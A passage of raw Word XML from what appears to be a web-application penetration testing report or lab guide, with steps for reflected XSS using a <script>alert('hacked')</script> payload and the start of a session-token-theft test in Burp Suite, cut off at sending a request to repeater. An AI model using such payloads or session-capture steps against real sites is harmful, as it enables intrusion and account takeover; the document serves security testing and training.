          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3FF65F5B" wp14:editId="29F4EC4A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>103202</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5430741" cy="943417"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="46426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68313" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5439576" cy="944952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B7D95" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="24BD8CB4" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="16CBAB7C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1E7E8293" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="766402A9" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="75C7159C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="71950A90" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7DC3311E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5529E7BA" w14:textId="77777777" w:rsidR="00DB227C" w:rsidRDefault="00DB227C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2C618FB6" w14:textId="77777777" w:rsidR="00DB227C" w:rsidRDefault="00DB227C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7D405609" w14:textId="77777777" w:rsidR="00DB227C" w:rsidRDefault="00DB227C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="104ADD31" w14:textId="77777777" w:rsidR="00DB227C" w:rsidRDefault="00DB227C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5F1A0C25" w14:textId="77777777" w:rsidR="00DB227C" w:rsidRDefault="00DB227C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="05A39DE0" w14:textId="77777777" w:rsidR="00DB227C" w:rsidRDefault="00DB227C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="35790A19" w14:textId="77777777" w:rsidR="00DB227C" w:rsidRDefault="00DB227C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="366E732E" w14:textId="77777777" w:rsidR="00DB227C" w:rsidRPr="000E6F01" w:rsidRDefault="00DB227C" w:rsidP="003D20B9"/>
    <w:p w14:paraId="44404103" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="700AE654" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6D332757" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5E791423" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="20835DF2" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="00B37817" w:rsidRDefault="003D20B9" w:rsidP="00B37817">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc224128479"/>
      <w:r w:rsidRPr="00B37817">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Testing for XSS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6AB7CD20" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:t>Goto ‘XSS reflected’ tab and enter the below script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28453804" w14:textId="4D61BE7C" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:t>&lt;script&gt;alert('hacked</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000E6F01">
        <w:t>')&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000E6F01">
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0282C0CE" w14:textId="39D58359" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="00986927" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DA09528" wp14:editId="1323DFD0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>31998</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5383033" cy="2719122"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5080"/>
            <wp:wrapNone/>
            <wp:docPr id="72046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63091" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5383033" cy="2719122"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2B6005" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="340FA112" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="56A306AE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="47442491" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1C3BA2F9" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="36E7EB32" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7BFBA636" w14:textId="77777777" w:rsidR="00B04D10" w:rsidRDefault="00B04D10" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0CA59A98" w14:textId="77777777" w:rsidR="00B04D10" w:rsidRDefault="00B04D10" w:rsidP="003D20B9"/>
    <w:p w14:paraId="540F4F7E" w14:textId="77777777" w:rsidR="00B04D10" w:rsidRDefault="00B04D10" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6CBF0C6F" w14:textId="77777777" w:rsidR="00B04D10" w:rsidRDefault="00B04D10" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3A0D128D" w14:textId="77777777" w:rsidR="00B04D10" w:rsidRPr="000E6F01" w:rsidRDefault="00B04D10" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7A36B49A" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1FBB772D" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="75D7BD4E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="70864FDF" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6BB305A3" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:t>The below pop-up box appears, suggesting XSS is successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEC2025" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7D74D100" wp14:editId="0582F932">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4172532" cy="1228896"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="177827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78014" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4172532" cy="1228896"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="769A14DD" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="101F51EE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1C96E3D1" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="63AE7FEC" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="386E6703" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="7E72B59A" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="11ADDB25" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="55BCDA34" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="490BECD5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="69898F74" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5D513A71" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="103BF112" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="669C0838" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="441A13C9" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="41D198CF" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4D4E69EB" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="0E87C05E" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4D0EC7B0" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2D6877D6" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="34879BB1" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="4EE44824" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="59BF27A7" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="48311E52" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="54835E12" w14:textId="764102BD" w:rsidR="003D20B9" w:rsidRPr="0094794C" w:rsidRDefault="003D20B9" w:rsidP="0094794C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc224128480"/>
      <w:r w:rsidRPr="0094794C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Testing for Session Token Theft</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4EBCC410" w14:textId="0C2232BD" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251688960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C9EA0F3" wp14:editId="2502107B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>319240</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5367130" cy="2380230"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:wrapNone/>
            <wp:docPr id="27117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72703" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5367130" cy="2380230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="000E6F01">
        <w:t>Capture the request for user id 1 in Burpsuite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABA6664" w14:textId="65731CBC" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1BF6D63C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="67856F58" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="050D81FA" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="724002B9" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1CB5682C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2005BAAD" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5CAEF4EA" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="175F43A4" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2BA58DEA" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="473E2656" w14:textId="77777777" w:rsidR="004D61AA" w:rsidRPr="000E6F01" w:rsidRDefault="004D61AA" w:rsidP="003D20B9"/>
    <w:p w14:paraId="766A284A" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="61988396" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="32FCF021" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2C94E547" w14:textId="760AE951" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AE107F3" wp14:editId="3EE3FEB5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3147</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>323768</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5371935" cy="3154864"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="26670"/>
            <wp:wrapNone/>
            <wp:docPr id="182730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06401" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5371935" cy="315486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0E6F01">
        <w:t>Request captured in Burpsuite.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672C8C9D" w14:textId="7E1B3D48" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="331B493D" w14:textId="02FDF55B" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="38D579B5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="70AAF8B5" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6A141D6E" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="20B9F189" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1873CFD1" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="2DF83D80" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="275C104C" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="11EA0150" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="59411B66" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="31C500E1" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6DBF95FF" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="083B2607" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="771C0FB0" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="3F028F15" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5CED9C4F" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="64FA8009" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="45335CBF" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="06F9A11F" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="6B5F22EE" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="197D664E" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="45C48FFB" w14:textId="77777777" w:rsidR="00E84B5D" w:rsidRPr="000E6F01" w:rsidRDefault="00E84B5D" w:rsidP="003D20B9"/>
    <w:p w14:paraId="69EA44CE" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="5B5E85B3" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="543C0F53" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="1F24C131" w14:textId="77777777" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9"/>
    <w:p w14:paraId="601426B4" w14:textId="1AA649EA" w:rsidR="003D20B9" w:rsidRPr="000E6F01" w:rsidRDefault="003D20B9" w:rsidP="003D20B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6F01">
        <w:lastRenderedPageBreak/>
        <w:t>Send the captured request to repeater.</w:t>
      </w:r>
    </w:p>
